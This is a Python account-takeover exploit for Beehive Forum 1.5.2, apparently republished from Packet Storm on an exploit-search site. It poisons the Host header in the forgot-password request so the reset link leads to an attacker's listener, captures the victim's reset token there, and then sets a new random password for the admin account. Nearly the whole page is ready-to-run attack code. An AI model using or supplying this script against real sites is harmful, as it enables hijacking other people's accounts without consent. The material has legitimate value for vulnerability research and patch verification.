Exploit for Beehive Forum 1.5.2 Account Takeover

Name: Exploit for Beehive Forum 1.5.2 Account Takeover
Rating: 5 (125 reviews)
2022-05-11 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:167075
# Exploit Title: Beehive Forum - Account Takeover  
# Date:08/05/2022.  
# Exploit Author: Pablo Santiago  
# Vendor Homepage: https://www.beehiveforum.co.uk/  
# Software Link: https://sourceforge.net/projects/beehiveforum/  
# Version: 1.5.2  
# Tested on: Kali Linux and Ubuntu 20.0.4  
# CVE N/A  
# PoC: https://imgur.com/a/hVlgpCg  
  
# Vulnerability: In the functionality "forgot password", it's possible to  
modify the Header "Host", #injecting malicious host, allowing stealing the  
token and resetting the password from a victim.#(Requires user interaction)  
  
import requests  
from bs4 import BeautifulSoup  
import socket  
import sys  
import urllib.parse  
import random  
import string  
  
endpoint = sys.argv[1]  
lhost = sys.argv[2]  
lport = int(sys.argv[3])  
hostheader = f'{lhost}:{lport}'  
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'  
url_change = f'http://{endpoint}/forum/change_pw.php'  
  
def init_req():  
session = requests.Session()  
r = session.get(url_forgot)  
cookie = session.cookies.get_dict()  
cookie = cookie['sess_hash']  
soup = BeautifulSoup(r.text, 'lxml')  
hash_request = soup.input['id']  
csrf_token = soup.input['value']  
return hash_request, csrf_token, cookie  
  
def forgot_req(hash_request: str, csrf_token: str, cookie: str):  
  
headers= {  
'Host': hostheader,  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)  
Gecko/20100101 Firefox/97.0',  
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',  
'Cookie' : 'sess_hash=' + cookie  
}  
  
data = {  
hash_request : csrf_token,  
'webtag' : 'TEST',  
'logon' : 'admin',  
'request' : 'Request'  
}  
  
r = requests.post(url_forgot, headers=headers, data=data)  
if('You should shortly receive an e-mail containing instructions for  
resetting your password' in r.text):  
print('')  
print('[*] A mail has been sent to the victim')  
socket_req()  
else:  
print('[*] The mail has not been sent')  
  
def socket_req():  
  
print(f"[*] Listening on port {lport}...." )  
print('[*] Waitting the victim clicks in the malicious link\n')  
s = socket.socket()  
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
s.bind((lhost, lport))  
s.listen()  
(sock_c, _) = s.accept()  
get_request = sock_c.recv(4096)  
user_token = urllib.parse.unquote_plus(get_request.split(b"  
HTTP")[0][-13:].decode("UTF-8"))  
  
print("[*] Stole token: " + user_token)  
change_pw(user_token)  
  
def change_pw(user_token: str):  
c = string.ascii_letters + string.digits  
password = ''.join(random.choice(c) for _ in range(6))  
hash_request, csrf_token, cookie = init_req()  
headers= {  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0)  
Gecko/20100101 Firefox/97.0',  
'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',  
'Cookie' : 'sess_hash=' + cookie  
}  
data = {  
hash_request : csrf_token,  
'webtag' : 'TEST',  
'u' : '1',  
'h' : user_token,  
'pw' : password,  
'cpw' : password,  
'save' : 'Save'  
}  
  
r = requests.post(url_change, headers=headers, data=data)  
if('Your password has been changed' in r.text):  
print(f'[*] The password has been changed to: {password}')  
  
else:  
print('[*] The password has been changed')  
  
  
hash_request, csrf_token, cookie = init_req()  
forgot_req(hash_request, csrf_token, cookie)